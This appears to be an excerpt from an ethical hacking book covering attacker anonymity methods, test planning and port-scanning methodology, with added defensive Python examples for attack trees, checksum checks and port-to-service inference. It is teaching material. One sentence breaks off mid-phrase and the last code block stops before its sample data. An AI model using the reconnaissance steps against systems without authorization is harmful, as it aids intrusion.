Malicious attackers usually learn from their mistakes. Every mistake moves them one step closer to breaking into someone’s system. They use this knowledge when carrying out future attacks. You, as a security professional responsible for testing the security of your environment, need to do the same.
Maintaining Anonymity
Smart attackers want to remain as low-key as possible. Covering their tracks is a priority, and many times their success depends on them remaining unnoticed. They want to avoid raising suspicion so they can come back and access the systems in the future. Hackers often remain anonymous by using one of the following resources:
Borrowed or stolen remote desktop and VPN accounts from friends or previous employers
Public computers at libraries, schools, or kiosks at the local mall
Open wireless networks
Internet proxy servers or anonymizer services
Anonymous or disposable e-mail accounts from free e-mail services
Open e-mail relays
Infected computers—also called zombies or bots—at other organizations
Workstations or servers on the victim’s own network
If hackers use enough stepping stones for their attacks, they are hard—practically impossible—to trace. Luckily, one of your biggest concerns—the malicious user—generally isn’t quite as savvy. That is, unless the user is an actual network or security administrator.
Developing Your Ethical Hacking Plan
In This Chapter
Setting security testing goals
Selecting which systems to test
Developing your testing standards
Examining hacking tools
As an information security professional, you must plan your security assessment efforts before you start. A detailed plan doesn’t mean that your testing must be elaborate. It just means that you’re clear and concise about what to do. Given the seriousness of ethical hacking, you should make this process as structured as possible.
Even if you test only a single web application or workgroup of computers, be sure to take the critical steps of establishing your goals, defining and documenting the scope of what you’ll be testing, determining your testing standards, and gathering and familiarizing yourself with the proper tools for the task. This chapter covers these steps to help you create a positive environment so you can set yourself up for success.
Do you need insurance?
If you’re an independent consultant or have a business with a team of security assessment professionals, consider getting professional liability insurance (also known as errors and omissions insurance) from an agent who specializes in business insurance coverage. This kind of insurance can be expensive but will be well worth the expense if something goes awry and you need protection. Many customers even require the insurance before they’ll hire you to do the work.
Establishing Your Goals
You can’t hit a target you can’t see. Your testing plan needs goals. The main goal of ethical hacking is to find vulnerabilities in your systems from the perspective of the bad guys so you can make your environment more secure. You can then take this a step further:
Define more specific goals. Align these goals with your business objectives. What are you and the management trying to get from this process? What performance criteria will you use to ensure you’re getting the most out of your testing?
Create a specific schedule with start and end dates as well as the times your testing is to take place. These dates and times are critical components of your overall plan.
Before you begin any testing, you absolutely, positively need everything in writing and approved. Document everything and involve management in this process. Your best ally in your testing efforts is a manager who supports what you’re doing.
The following questions can start the ball rolling when you define the goals for your ethical hacking plan:
Does your testing support the mission of the business and its IT and security departments?
What business goals are met by performing ethical hacking? These goals may include the following:
Working through Statement on Standards for Attestation Engagements (SSAE) 16 audits
Meeting federal regulations such as the Health Insurance Portability and Accountability Act (HIPAA) and the Payment Card Industry Data Security Standard (PCI DSS)
Meeting contractual requirements of clients or business partners
Maintaining the company’s image
Prepping for the internationally accepted security standard of ISO/IEC 27001:2013
How will this testing improve security, IT, and the business as a whole?
What information are you protecting? This could be personal health information, intellectual property, confidential client information, or employees’ private information.
How much money, time, and effort are you and your organization willing to spend on security assessments?
What specific deliverables will there be? Deliverables can include anything from high-level executive reports to detailed technical reports and write-ups on what you tested, along with the outcomes of your tests. You can deliver specific information that is gleaned during your testing, such as passwords and other confidential information.
What specific outcomes do you want? Desired outcomes include the justification for hiring or outsourcing security personnel, increasing your security budget, meeting compliance requirements, or enhancing security systems.
After you know your goals, document the steps to get there. For example, if one goal is to develop a competitive advantage to keep existing customers and attract new ones, determine the answers to these questions:
When will you start your testing?
Will your testing approach be blind, in which you know nothing about the systems you’re testing, or knowledge-based, in which you’re given specific information about the systems you’re testing, such as IP addresses, hostnames, and even usernames and passwords? I recommend the latter.
Will your testing be technical in nature, involve physical security assessments, or even use social engineering?
Will you be part of a larger ethical hacking team, sometimes called a tiger team or red team?
Will you notify the affected parties of what you’re doing and when you’re doing it? If so, how?
Customer notification is a critical issue. Many customers appreciate that you’re taking steps to protect their information. Approach the testing in a positive way. Don’t say, “We’re breaking into our own systems to see what information is vulnerable to hackers,” even if that’s what you’re doing. Instead, say that you’re assessing the overall security of your network environment so the information will be as secure as possible.
How will you know whether customers even care about what you’re doing?
How will you notify customers that the organization is taking steps to enhance the security of their information?
What measurements can ensure that these efforts are paying off?
Establishing your goals takes time, but you won’t regret it. These goals are your road map. If you have any concerns, refer to these goals to make sure that you stay on track. Additional resources on goal setting and management can be found in the Appendix.
Determining Which Systems to Hack
After you’ve established your overall goals, decide which systems to test. You probably don’t want—or need—to assess the security of all your systems at the same time. Assessing the security of all your systems could be quite an undertaking and might lead to problems. I’m not recommending that you don’t eventually assess every computer and application you have. I’m just suggesting that whenever possible, you should break your projects into smaller chunks to make them more manageable. You might decide which systems to test based on a high-level risk analysis, answering questions such as
What are your most critical systems? Which systems, if accessed without authorization, would cause the most trouble or suffer the greatest losses?
Which systems appear most vulnerable to attack?
Which systems crash the most?
Which systems are not documented, are rarely administered, or are the ones you know the least about?
The following list includes devices, systems, and applications that you may consider performing your hacking tests on:
Routers and switches
Firewalls
Wireless access points
Web applications (both internal and hosted in the cloud)
Application and database servers
E-mail and file servers
Mobile devices (such as phones and tablets) that store confidential information
Physical security cameras and access control systems
SCADA and industrial control systems
Workstation and server operating systems
What specific systems you should test depends on several factors. If you have a small network, you can test everything. Consider testing just public-facing hosts such as e-mail and web servers and their associated applications. The ethical hacking process is flexible. Base these decisions on what makes the most business sense.
Start with the most vulnerable systems and consider these factors:
Whether the computer or application resides on the network or in the cloud
Which operating system and application(s) the system runs
Attack tree analysis
Attack tree analysis is the process of creating a flowchart-type mapping of how malicious attackers would attack a system. Attack trees are typically used in higher-level information risk analyses and by security-savvy development teams when planning out a new software project. If you really want to take your security testing to the next level by thoroughly planning your attacks, working very methodically, and being more professional to boot, then attack tree analysis is just the tool you need.
The only drawback is that attack trees can take considerable time to draw out and require a fair amount of expertise. Why sweat it, though, when you can use a computer to do a lot of the work for you? A commercial tool called SecurITree, by Amenaza Technologies Limited (www.amenaza.com), specializes in attack tree analysis, and you may consider adding it to your toolbox. Of course, you could also use Microsoft Visio or SmartDraw (www.smartdraw.com). The following figure shows a sample SecurITree attack tree analysis.
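The evaluation behind an attack tree, as an added example that is not the book’s code or SecurITree’s: a goal is refined through AND/OR nodes down to leaf steps with an estimated attacker cost, and the tree is re-evaluated after a countermeasure to see whether the cheapest path actually moved. The sample tree, its node names and its cost units are constructed for illustration, not real estimates.

```python
"""Minimal attack tree evaluator (added example, not from the book).

A goal node is refined by AND / OR children down to leaf attack steps.
Each leaf carries an estimated attacker cost; an OR node costs as much as
its cheapest child, an AND node as much as all its children together.
Re-running the evaluation after a countermeasure shows which control
actually raises the attacker's cheapest path, which is the question a
defender wants the tree to answer.
"""
import copy
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

INFEASIBLE = float("inf")   # a step a control removes entirely


@dataclass
class Node:
    name: str
    kind: str = "LEAF"          # "LEAF", "AND" or "OR"
    cost: float = 0.0           # estimated attacker cost, leaves only
    children: List["Node"] = field(default_factory=list)


def cheapest(node: Node) -> Tuple[float, List[str]]:
    """Return (cost, leaf steps) of the cheapest way to achieve `node`."""
    if node.kind == "LEAF":
        return node.cost, [node.name]
    if node.kind == "OR":
        # Attacker picks one child: the cheapest feasible one wins.
        best: Tuple[float, List[str]] = (INFEASIBLE, [])
        for child in node.children:
            candidate = cheapest(child)
            if candidate[0] < best[0]:
                best = candidate
        return best
    if node.kind == "AND":
        # Attacker must complete every child; costs add up, and one
        # infeasible child makes the whole branch infeasible.
        total, steps = 0.0, []
        for child in node.children:
            cost, sub_steps = cheapest(child)
            total += cost
            steps.extend(sub_steps)
        return total, steps
    raise ValueError(f"unknown node kind {node.kind!r}")


def find(node: Node, name: str) -> Optional[Node]:
    """Locate a node by name (used to apply countermeasures)."""
    if node.name == name:
        return node
    for child in node.children:
        hit = find(child, name)
        if hit is not None:
            return hit
    return None


def build_sample_tree() -> Node:
    """Constructed sample tree: goal of reading a customer database.

    Costs are made-up relative effort units, not real estimates.
    """
    return Node("Read customer DB", "OR", children=[
        Node("Steal admin credentials", "AND", children=[
            Node("Phish an administrator", cost=3),
            Node("Log in over VPN with stolen creds", cost=1),
        ]),
        Node("Exploit unpatched DB server", "AND", children=[
            Node("Find DB server from the Internet", cost=2),
            Node("Run exploit for old DB version", cost=4),
        ]),
        Node("Walk out with backup tape", cost=9),
    ])


def with_countermeasure(tree: Node, leaf_name: str, new_cost: float) -> Node:
    """Return a copy of the tree with one leaf's cost changed.

    Raising a cost models a control (MFA, patching, a locked tape safe);
    INFEASIBLE models a control that removes the step entirely.
    """
    clone = copy.deepcopy(tree)
    leaf = find(clone, leaf_name)
    if leaf is None or leaf.kind != "LEAF":
        raise KeyError(leaf_name)
    leaf.cost = new_cost
    return clone


if __name__ == "__main__":
    tree = build_sample_tree()
    print("baseline:  ", cheapest(tree))
    # MFA on the VPN makes a phished password alone useless for that branch.
    hardened = with_countermeasure(tree, "Log in over VPN with stolen creds", INFEASIBLE)
    print("after MFA: ", cheapest(hardened))
```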
A previous security risk assessment, vulnerability test, or business impact analysis may already have generated answers to the preceding questions. If so, that documentation can help identify systems for further testing. Bow Tie and Failure Modes and Effects Analysis (FMEA) are additional approaches.
Ethical hacking goes a few steps deeper than higher-level information risk assessments and, especially, vulnerability scans. With ethical hacking, you often start by gleaning information on all systems—including the organization as a whole—and then further assessing the most vulnerable systems. But again, this process is flexible. I discuss the ethical hacking methodology in Chapter 4.
Another factor that will help you decide where to start is to assess the systems that have the greatest visibility. For example, focusing on a database or file server that stores client or other critical information may make more sense—at least initially—than concentrating on a firewall or web server that hosts marketing information about the
Creating Testing Standards
One miscommunication or slip-up can send the systems crashing during your ethical hacking tests. No one wants that to happen. To prevent mishaps, develop and document testing standards. These standards should include
When the tests are performed, along with the overall timeline
Which tests are performed
How much knowledge of the systems you acquire in advance
How the tests are performed and from what source IP addresses (if performed from an external source over the Internet)
What you do when a major vulnerability is discovered
This is a list of general best practices—you can apply more standards for your situation. The following sections describe these general best practices in more detail.
Timing
They say that it’s “all in the timing.” This is especially true when performing security tests. Make sure that the tests you perform minimize disruption to business processes, information systems, and people. You want to avoid harmful situations such as miscommunicating the timing of tests and causing a denial of service (DoS) attack against a high-traffic e-commerce site in the middle of the day or performing password-cracking tests in the middle of the night. It’s amazing what a 12-hour time difference (2 p.m. during major production versus 2 a.m. during a slower period) can make when testing your systems! Even having people in different time zones can create issues. Everyone on the project needs to agree on a detailed timeline before you begin. Having the team members’ agreement puts everyone on the same page and sets correct expectations.
If possible and practical, notify your Internet service providers (ISPs), cloud service providers, or hosting collocation (colo) providers. These companies have firewalls or intrusion prevention systems (IPS) in place to detect malicious behavior. If your provider knows you’re conducting tests, it’s less likely to block your traffic.
Your testing timeline should include specific short-term dates and times of each test, the start and end dates, and any specific milestones in between. You can develop and enter your timeline into a simple spreadsheet or Gantt chart, or in a larger project plan. A timeline such as the following keeps things simple and provides a reference during testing:

Test Performed                          Start Time      Projected End Time
Web application vulnerability scanning  July 1, 21:00   July 2, 07:00
OS vulnerability scanning               July 2, 10:00   July 3, 02:00
OS vulnerability exploitation           July 3, 08:00   July 3, 17:00
Running specific tests
You might have been charged with performing a general penetration test, or you may want to perform specific tests, such as cracking passwords or trying to gain access to a web application. Or you might be performing a social engineering test or assessing Windows on the network. However you test, you might not want to reveal the specifics of the testing. Even when your manager or client doesn’t require detailed records of your tests, document what you’re doing at a high level. Documenting your testing can help eliminate any potential miscommunication and keep you out of hot water. It might also be needed as evidence should you uncover malfeasance.
Enabling logging on the systems you test along with the tools you use can provide evidence of what and when you test and more. It may be overkill, but you could even record screen actions using a tool such as TechSmith’s Camtasia Studio (www.techsmith.com/camtasia.html).
Sometimes, you might know the general tests that you perform, but if you use automated tools, it may be next to impossible to understand every test you perform completely. This is especially true when the software you’re using receives real-time vulnerability updates and patches from the vendor each time you run it. The potential for frequent updates underscores the importance of reading the documentation and readme files that come with the tools you use.
An updated program once bit me. I was performing a vulnerability scan on a client’s website—the same test I performed the previous week. The client and I had scheduled the test date and time in advance. But I didn’t know that the software vendor made some changes to its web form submission tests, and I accidentally flooded the client’s web application, creating a DoS condition.
Luckily, this DoS condition occurred after business hours and didn’t affect the client’s operations. However, the client’s web application was coded to generate an e-mail for every form submission and there was no CAPTCHA on the page to limit successive submissions. The application developer and company’s president received 4,000 e-mails in their inboxes within about 10 minutes—ouch!
My experience is a perfect example of not knowing how my tool was configured by default and what it would do in that situation. I was lucky that the president was tech-savvy and understood the situation. Remember to have a contingency plan in case a situation like mine occurs. Just as important, set people’s expectations that trouble can occur—even when you’ve taken all the right steps to ensure everything’s in check.
Blind versus knowledge assessments
Having some knowledge of the systems you’re testing is generally the best approach, but it’s not required. Having a basic understanding of the systems you hack can protect you and others. Obtaining this knowledge shouldn’t be difficult if you’re testing your own in-house systems. If you’re testing a client’s systems, you might have to dig a little deeper into how the systems work so you’re familiar with them. Doing so has always been my practice and I’ve only had a small number of clients ask for a full blind assessment because most people are scared of them. This doesn’t mean that blind assessments aren’t valuable, but the type of assessment you carry out depends on your specific needs.
The best approach is to plan on unlimited attacks, wherein any test is fair game, possibly even including DoS testing. The bad guys aren’t poking around on your systems within a limited scope, so why should you?
Consider whether the tests should be performed so that they’re undetected by network administrators and any managed security service providers or related vendors. Though not required, this practice should be considered, especially for social engineering and physical security tests. I outline specific tests for those subjects in Chapters 6 and 7.
If too many insiders know about your testing, they might create a false sense of vigilance by improving their habits, which can end up negating the hard work you put into the testing. This doesn’t mean you shouldn’t tell anyone. It’s almost always a good idea to inform the owner of the system who may not be your sponsor. Always have a main point of contact—preferably someone with decision-making authority.
Picking your location
The tests you perform dictate where you must run them from. Your goal is to test your systems from locations accessible by malicious hackers or insiders. You can’t predict whether you’ll be attacked by someone inside or outside your network, so cover all your bases as much as you can. Combine external (public Internet) tests and internal (private LAN) tests.
You can perform some tests, such as password cracking and network infrastructure assessments, from your office. For external tests that require network connectivity, you might have to go off-site (a good excuse to work from home), use an external proxy server, or simply use guest Wi-Fi. Some security vendors’ vulnerability scanners can even be run from the cloud, so that would work as well. Better yet, if you can assign an available public IP address to your computer, simply plug in to the network on the outside of the firewall for a hacker’s-eye view of your systems. Internal tests are easy because you need only physical access to the building and the network. You might be able to use a DSL line or cable modem already in place for visitors and guest access.
Responding to vulnerabilities you find
Determine ahead of time whether you’ll stop or keep going when you find a critical security hole. You don’t need to keep testing forever. Just follow the path you’re on until you’ve met your objectives or reached your goals. When in doubt, the best thing to do is to have a specific goal in mind and then stop when that goal has been met.
If you don’t have goals, how are you going to know when you arrive at your security testing destination?
Having said this, if you discover a major hole, I recommend contacting the right people as soon as possible so that they can begin fixing the issue right away. The right people may be software developers, product or project managers, or even CIOs. If you wait a few days or weeks, someone might exploit the vulnerability and cause damage that could’ve been prevented.
Making silly assumptions
You’ve heard about what you make of yourself when you assume things. Even so, you make assumptions when you test your systems. Here are some examples of those assumptions:
All of the computers, networks, applications, and people are available when you’re testing.
You have all the proper testing tools.
The testing tools you use will minimize the chances of crashing the systems you test.
You understand the likelihood that existing vulnerabilities were not found or that you used your testing tools improperly.
You know the risks of your tests.
Document all assumptions. You won’t regret it.
Selecting Security Assessment Tools
Which security assessment tools you need depend on the tests you’re going to run. You can perform some ethical hacking tests with a pair of sneakers, a telephone, and a basic workstation on the network, but comprehensive testing is easier with good, dedicated tools.
The tools discussed in this book are not malware. The tools and even their websites may be flagged as such by certain anti-malware and web filtering software but they’re not. The tools I cover are legitimate tools—many of which I have used for years. If you experience trouble downloading, installing, or running the tools I cover in this book, you may consider configuring your system to allow them through or otherwise trust their execution. Keep in mind that I can’t make any promises. Use checksums where possible by comparing the original MD5 or SHA checksum with the one you get using a tool such as CheckSum Tool (http://sourceforge.net/projects/checksumtool). A criminal could always inject malicious code into the actual tools, so there’s no guarantee of security. You knew that anyway, right?
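The checksum comparison the paragraph recommends, as an added example that is not the book’s code or CheckSum Tool’s: it parses the common “digest, whitespace, filename” checksum-list layout that md5sum/sha256sum-style tools produce, picks the algorithm from the digest length, hashes the download in chunks and compares in constant time. The file names, file contents and checksum list are constructed inline so it runs offline.

```python
"""Verify downloaded tools against a published checksum list.

Added example, not from the book or from CheckSum Tool. Flow: parse the
vendor's checksum list, hash each local file with the matching algorithm,
and report per-file results. A file that is missing or altered fails.
"""
import hashlib
import hmac
import os
import tempfile
from typing import Dict, Tuple

# Hex digest length -> hashlib algorithm name (the book mentions MD5 and SHA).
_ALGO_BY_HEXLEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def parse_checksum_file(text: str) -> Dict[str, str]:
    """Map filename -> expected hex digest from checksum-list lines.

    Accepts the GNU coreutils layout: digest, whitespace, optional '*'
    (binary-mode marker), filename. Blank lines and '#' comments are skipped;
    anything else is rejected rather than silently ignored.
    """
    expected: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) not in _ALGO_BY_HEXLEN:
            raise ValueError(f"malformed checksum line: {line!r}")
        digest, name = parts[0].lower(), parts[1].strip().lstrip("*")
        try:
            int(digest, 16)          # digest must be hex
        except ValueError:
            raise ValueError(f"non-hex digest in line: {line!r}")
        expected[name] = digest
    return expected


def file_digest(path: str, algo: str) -> str:
    """Hash a file in chunks so large installers need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(path: str, expected_hex: str) -> Tuple[bool, str]:
    """Return (matched, algorithm) for one file against its published digest."""
    algo = _ALGO_BY_HEXLEN[len(expected_hex)]
    actual = file_digest(path, algo)
    # Constant-time compare is the right habit even for a local file check.
    return hmac.compare_digest(actual, expected_hex.lower()), algo


def verify_download_dir(directory: str, checksum_text: str) -> Dict[str, bool]:
    """Verify every file named in the checksum list; missing files fail."""
    results: Dict[str, bool] = {}
    for name, digest in parse_checksum_file(checksum_text).items():
        path = os.path.join(directory, name)
        results[name] = os.path.isfile(path) and verify(path, digest)[0]
    return results


def demo() -> Dict[str, bool]:
    """Constructed scenario: an intact download, a tampered one, a missing one."""
    genuine = b"pretend this is the scanner installer\n"   # constructed bytes
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "scanner.zip"), "wb") as fh:
            fh.write(genuine)
        with open(os.path.join(tmp, "plugin.zip"), "wb") as fh:
            fh.write(genuine + b"\x00injected\x00")   # altered after publishing
        # The vendor's list, constructed here from the genuine bytes.
        published = (
            f"# constructed checksum list\n"
            f"{hashlib.sha256(genuine).hexdigest()}  scanner.zip\n"
            f"{hashlib.sha256(genuine).hexdigest()} *plugin.zip\n"
            f"{hashlib.md5(genuine).hexdigest()}  missing.zip\n"
        )
        return verify_download_dir(tmp, published)


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{'OK ' if ok else 'BAD'} {name}")
```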
If you’re not sure what tools to use, fear not. Throughout this book I introduce a wide variety of tools—both free and commercial—that you can use to accomplish your tasks. Chapter 1 provides a list of commercial, freeware, and open source tools. The Appendix contains a comprehensive listing of tools for your reference.
It’s important to know what each tool can and can’t do and how to use each one. I suggest reading the manual and other Help files. Unfortunately, some tools have limited documentation, which can be frustrating. You can search forums and post a message if you’re having trouble with a tool.
Security vulnerability scanning and exploit tools can be hazardous to your network’s health. Be careful when you use them. Always make sure that you understand what every option does before you use it. Try your tools on test systems if you’re not sure how to use them. Even if you are familiar with them, this precaution can help prevent DoS conditions and loss of data on your production systems.
If you’re like me, you may despise some freeware and open source security tools. There are plenty that have wasted hours of my life that I’ll never get back. If these tools end up causing you more headaches than they’re worth, or don’t do what you need them to do, consider purchasing commercial alternatives. They’re often easier to use and typically generate better high-level executive reports. Some commercial tools are expensive to acquire, but their ease of use and functionality often justify the initial and ongoing costs. In most situations with security tools, you get what you pay for.
Hacking Methodology
In This Chapter
Examining steps for successful ethical hacking
Gleaning information about your organization from the Internet
Scanning your network
Looking for vulnerabilities
Before you dive in head first with your security testing, it’s critical to have a methodology to work from. Vulnerability assessments and penetration testing involve more than just poking and prodding a system or network. Proven techniques can help guide you along the hacking highway and ensure that you end up at the right destination. Using a methodology that supports your testing goals separates you from the amateurs. A methodology also helps ensure that you make the most of your time and effort.
Setting the Stage for Testing
In the past, a lot of security assessment techniques involved manual processes. Now, certain vulnerability scanners can automate various tasks, from testing to reporting to remediation validation (the process of determining whether a vulnerability was fixed). Some vulnerability scanners can even help you take corrective actions. These tools allow you to focus on performing the tests and less on the specific steps involved. However, following a general methodology and understanding what’s going on behind the scenes will help you find the things that really matter.
Think logically—like a programmer, a radiologist, or a home inspector—to dissect and interact with all the system components to see how they work. You gather information, often in many small pieces, and assemble the pieces of the puzzle. You start at point A with several goals in mind, run your tests (repeating many steps along the way), and move closer until you discover security vulnerabilities at point B.
The process used for such testing is basically the same as the one a malicious attacker would use. The primary differences lie in the goals and how you achieve them. Today’s attacks can come from any angle against any system, not just from the perimeter of your network and the Internet as you might have been taught in the past. Test every possible entry point, including partner, vendor, and customer networks, as well as home users, wireless networks, and mobile devices. Any human being, computer system, or physical component that protects your computer systems—both inside and outside your buildings—is fair game for attack, and it needs to be tested, eventually.
When you start rolling with your testing, you should keep a log of the tests you perform, the tools you use, the systems you test, and your results. This information can help you do the following:
Track what worked in previous tests and why.
Help prove what you did.
Correlate your testing with firewalls and intrusion prevention systems (IPSs) and other log files if trouble or questions arise.
Document your findings.
In addition to general notes, taking screen captures of your results (using Snagit, Camtasia, or a similar tool) whenever possible is very helpful. These shots come in handy later should you need to show proof of what occurred, and they also will be useful as you generate your final report. Also, depending on the tools you use, these screen captures might be your only evidence of vulnerabilities or exploits when it comes time to write your final report. Chapter 3 lists the general steps involved in creating and documenting an ethical hacking plan.
Your main task is to find the vulnerabilities and simulate the information gathering and system compromises carried out by someone with malicious intent. This task can be a partial attack on one computer, or it can constitute a comprehensive attack against the entire network. Generally, you look for weaknesses that malicious users and external attackers might exploit. You’ll want to assess both external and internal systems (including processes and procedures that involve computers, networks, people, and physical infrastructures). Look for vulnerabilities; check how all your systems interconnect and how private systems and information are (or aren’t) protected from untrusted elements.
These steps don’t include specific information on the methods that you use for social engineering and assessing physical security, but the techniques are basically the same. I cover social engineering and physical security in more detail in Chapters 6 and 7, respectively.
If you’re performing a security assessment for a client, you may go the blind assessment route, which means you basically start with just the company name and no other information. This blind assessment approach allows you to start from the ground up and gives you a better sense of the information and systems that malicious attackers can access publicly. Whether you choose to assess blindly (i.e., covertly) or overtly, keep in mind that the blind way of testing can take longer, and you may have an increased chance of missing some security vulnerabilities. It’s not my preferred testing method, but some people may insist on it.
As a security professional, you might not have to worry about covering your tracks or evading IPSs or related security controls because everything you do is legitimate. But you might want to test systems stealthily. In this book, I discuss techniques that hackers use to conceal their actions and outline some countermeasures for concealment techniques.
Seeing What Others See
Getting an outside look can turn up a ton of information about your organization and systems that others can see, and you do so through a process often called footprinting. Here's how to gather the information:
- Use a web browser to search for information about your organization. Search engines, such as Google and Bing, are great places to start.
- Run network scans, probe open ports, and seek out vulnerabilities to determine specific information about your systems. As an insider, you can use port scanners, network discovery tools, and vulnerability scanners such as Nmap, SoftPerfect Network Scanner, and GFI LanGuard, to see what's accessible and to whom.
Whether you search generally or probe more technically, limit the amount of information you gather based on what's reasonable for you. You might spend an hour, a day, or a week gathering this information. How much time you spend depends on the size of your organization and the complexity of the information systems you're testing.
Gathering public information
The amount of information you can gather about an organization's business and information systems can be staggering and is often widely available on the Internet. Your job is to find out what's out there. From social media to search engines to dedicated intelligence-gathering tools, you can gain quite a bit of insight into network and information vulnerabilities if you look in the right places. This information allows malicious attackers and employees to gain potentially sensitive information and target specific areas of the organization, including systems, departments, and key individuals. I cover information gathering in detail in Chapter 5.
Scanning Systems
Active information gathering produces more details about your network and helps you see your systems from an attacker's perspective. For instance, you can:
- Use the information provided by WHOIS searches to test other closely related IP addresses and hostnames. When you map out and gather information about a network, you see how its systems are laid out. This information includes determining IP addresses, hostnames (typically external but occasionally internal), running protocols, open ports, available shares, and running services and applications.
- Scan internal hosts when and where they are within the scope of your testing. (Tip: They really ought to be.) These hosts might not be visible to outsiders (at least you hope they're not), but you absolutely need to test them to see what rogue (or even curious or misguided) employees, other insiders, and even malware controlled by outside parties can access. A worst-case situation is that the intruder has set up shop on the inside. Just to be safe, examine your internal systems for weaknesses.
If you're not completely comfortable scanning your systems, consider first using a lab with test systems or a system running virtual machine software, such as the following:
- VMware Workstation Pro (www.vmware.com/products/workstation/overview.html)
- VirtualBox, the open source virtual machine alternative that works very well (www.virtualbox.org)
Hosts
Scan and document specific hosts that are accessible from the Internet and your internal network. Start by pinging either specific hostnames or IP addresses with one of these tools:
- The basic ping utility that's built into your operating system
- A third-party utility that allows you to ping multiple addresses at the same time, such as NetScanTools Pro (www.netscantools.com) for Windows and fping (http://fping.sourceforge.net) for Linux
The site WhatIsMyIP.com (www.whatismyip.com) shows how your gateway IP address appears on the Internet. Just browse to that site, and your public IP address (your firewall or router — preferably not your local computer) appears. This information gives you an idea of the outermost IP address that the world sees.
Open ports
Scan for open ports by using network scanning and analysis tools:
- Scan network ports with NetScanTools Pro or Nmap (http://nmap.org). See Chapter 9 for details.
- Monitor network traffic with a network analyzer, such as OmniPeek (www.savvius.com) or Wireshark (www.wireshark.com). I cover this topic in various chapters throughout this book.
Scanning internally is easy. Simply connect your PC to the network, load the software, and fire away. Just be aware of network segmentation and internal IPSs that may impede your work. Scanning from outside your network takes a few more steps, but it can be done. The easiest way to connect and get an outside-in perspective is to assign your computer a public IP address and plug that system into a switch on the public side of your firewall or router. Physically, the computer isn't on the Internet looking in, but this type of connection works just the same as long as it's outside your network perimeter. You can also do this outside-in scan from home or from a remote office location.
Determining What's Running on Open Ports
As a security professional, you need to gather the things that count when scanning your systems. You can often identify the following information:
- Protocols in use, such as IP, domain name system (DNS), and NetBIOS (Network Basic Input/Output System)
- Services running on the hosts, such as e-mail, web servers, and database applications
- Available remote access services, such as Remote Desktop Protocol (RDP), telnet, and Secure Shell (SSH)
- Virtual Private Network (VPN) services, such as PPTP, SSL/TLS, and IPsec
- Permissions and authentication requirements for network shares
You can look for the following sampling of open ports (your network-scanning program reports these as accessible or open):
- Ping (ICMP echo) replies, showing that ICMP traffic is allowed to and from the host
- TCP port 21, showing that FTP is running
- TCP port 23, showing that telnet is running
- TCP ports 25 or 465 (SMTP and SMTPS), 110 or 995 (POP3 and POP3S), or 143 or 993 (IMAP and IMAPS), showing that an e-mail server is running
- TCP/UDP port 53, showing that a DNS server is running
- TCP ports 80, 443, and 8080, showing that a web server or web proxy is running
- TCP/UDP ports 135, 137, 138, 139 and, especially, 445, showing that a Windows host is running
Thousands of ports can be open — 65,534 each for both TCP (Transmission Control Protocol) and UDP (User Datagram Protocol), to be exact. I cover many popular port numbers when describing security checks throughout this book. A continually updated listing of all well-known port numbers (ports 0–1023) and registered port numbers (ports 1024–49151), with their associated protocols and services, is located at www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt. You can also perform a port number lookup at www.cotse.com/cgi-bin/port.cgi.
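The following Python script, added here as an example and not taken from the book, turns a scanner's list of open ports into the inferences listed above and, for an outside-in scan, flags the services a defender would not want reachable from the Internet. The one-line-per-port input format and the three sample hosts are constructed for the example.

```python
"""Turn a list of open ports into the inferences the chapter describes.

Added example, not code from the book. The input format is constructed to
mimic a scanner's summary: one line per open port, "<host> <proto>/<port>",
with ICMP echo replies written as "<host> icmp/echo".
"""
import re
from collections import defaultdict

# Inferences for the sample ports the chapter lists.
PORT_HINTS = {
    ("tcp", 21): "FTP is running",
    ("tcp", 23): "telnet is running",
    ("tcp", 25): "an e-mail server is running (SMTP)",
    ("tcp", 465): "an e-mail server is running (SMTPS)",
    ("tcp", 110): "an e-mail server is running (POP3)",
    ("tcp", 995): "an e-mail server is running (POP3S)",
    ("tcp", 143): "an e-mail server is running (IMAP)",
    ("tcp", 993): "an e-mail server is running (IMAPS)",
    ("tcp", 53): "a DNS server is running",
    ("udp", 53): "a DNS server is running",
    ("tcp", 80): "a web server or web proxy is running",
    ("tcp", 443): "a web server or web proxy is running",
    ("tcp", 8080): "a web server or web proxy is running",
}
# Any of these (TCP or UDP) points to a Windows host; 445 is the strongest signal.
WINDOWS_PORTS = {135, 137, 138, 139, 445}
# Defender view: services that should not be reachable from the Internet.
RISKY_EXTERNAL = {
    ("tcp", 21): "FTP (clear-text credentials)",
    ("tcp", 23): "telnet (clear-text remote login)",
    ("tcp", 139): "NetBIOS session service",
    ("tcp", 445): "SMB (Windows file sharing)",
}

LINE_RE = re.compile(r"^(\S+)\s+(tcp|udp|icmp)/(\S+)$")


def parse_scan(text):
    """Return {host: set of (proto, port)}; ICMP entries keep the port 'echo'."""
    hosts = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable scan line: {line!r}")
        host, proto, port = m.groups()
        hosts[host].add((proto, "echo" if proto == "icmp" else int(port)))
    return dict(hosts)


def infer_services(ports):
    """Map one host's open ports to the chapter's inferences, deduplicated."""
    findings = set()
    for proto, port in ports:
        if proto == "icmp":
            findings.add("ICMP traffic is allowed to and from the host")
        elif port in WINDOWS_PORTS:
            findings.add("a Windows host is running")
        elif (proto, port) in PORT_HINTS:
            findings.add(PORT_HINTS[(proto, port)])
        else:
            # Not in the chapter's sample list: the book's advice is to dig further.
            findings.add(f"unrecognised open {proto}/{port}; dig further")
    return sorted(findings)


def flag_exposures(ports, external):
    """List risky services on a host, but only when the scan was outside-in."""
    if not external:
        return []
    return sorted(RISKY_EXTERNAL[p] for p in ports if p in RISKY_EXTERNAL)


def assess(text, external=False):
    """Per host: what the open ports say is running, and what should not be exposed."""
    return {
        host: {"services": infer_services(ports),
               "exposed": flag_exposures(ports, external)}
        for host, ports in parse_scan(text).items()
    }


# Constructed sample: what an outside-in scan of three hosts might summarise to.
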